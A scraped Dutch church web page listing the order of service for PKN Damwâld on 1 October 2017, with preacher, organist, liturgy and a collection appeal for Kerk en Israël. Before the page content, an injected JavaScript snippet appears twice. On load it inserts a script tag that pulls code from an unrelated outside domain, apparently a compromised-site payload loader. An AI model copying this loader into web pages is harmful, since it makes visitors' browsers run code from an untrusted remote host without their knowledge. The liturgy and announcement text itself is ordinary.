;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Kerkdienst zondag 1 oktober 2017 9:30 uur - PKN Damwâld
zondag 1 oktober 2017
09:30 uur
Koffie na de dienst in 't Skûlplak

Kerkdienst zondag 1 oktober 2017 9:30 uur

Informatie

Voorganger:Ds. W.J. van Dijk, Surhuisterveen
Organist:Nienke van der Heide-Visser
Mededeling:Koffie na de dienst in 't Skûlplak
Liturgie
lied voor de dienst ELB 203: 1,2,3,4
Welkom en mededelingen
Aanvangslied psalm 81: 1.4,9
Stil gebed, Votum en Groet .
Klein gloria
Ere zij de Vader en de Zoon en de heilige Geest, als in den beginne, nu en immer, en van eeuwigheid tot eeuwigheid, amen.
We zingen: psalm 111:1,2,6
Leefregel Efeze 4: 17-32
We zingen: gezang 429: 1,2,3
. Gebed om Gods Geest
We lezen: Mt. 13: 24-30 en Mt. 22: 1-14
We zingen: gezang 301: 1,2,5
Prediking
We zingen: gezang 477: 1,2
Dankgebed en voorbede .
Collecte
Slotlied ELB 357: 1,3,4
Zegen
Liturgie met de liedteksten is alleen beschikbaar met een Mijn Kerk account. Inloggen
Locatie: Bonifatiuskerk Foarwei 2, Damwâld
Dienst terugluisteren Dienst terugluisteren
Collecte informatie
Eerste collecte: Kerk en Israël

1 oktober: Collecte Kerk en Israël
Vandaag is het Israëlzondag. Op deze dag staan we stil bij onze verbondenheid met het Joodse volk. In de collecte geven we voor projecten die de relatie met Israël levend houden, in Israël zelf, maar ook in Nederland. In Israël steunen we het werk in Nes Ammim. De Christelijke leef- en werkgemeenschap in dit dorp zet zich in om het vertrouwen tussen joden en Christenen te vergroten. In het dorp wordt op dit moment een nieuwe wijk gebouwd waar Joodse en Arabische gezinnen samen gaan leven. Een uniek project, dat onze hartelijke steun verdient! In Nederland steunen we met deze collecte het werk van OJEC, een organisatie die ervoor zorgt dat het gesprek tussen joden en Christenen in ons eigen land gevoerd wordt. Dat wil ook Kerk en Israël van de Protestantse Kerk. Kerk en Israël wil theologen en andere belangstellenden in de relatie tussen kerk en het Joodse geloof voeden en inspireren met informatie over de Joodse bronnen van ons geloof. Veel informatie is te vinden in het tijdschrift Kerk en Israël Onderweg. Ook zijn er regelmatig lezingen en symposia voor theologen en andere belangstellenden. Onze relatie met het Joodse volk en de Joodse traditie is wezenlijk voor onze Christelijke identiteit en ons Christelijk geloof. Daarom bevelen we deze collecte van harte bij u aan.

Tweede collecte: Kerk
Uitganscollecte: Kerk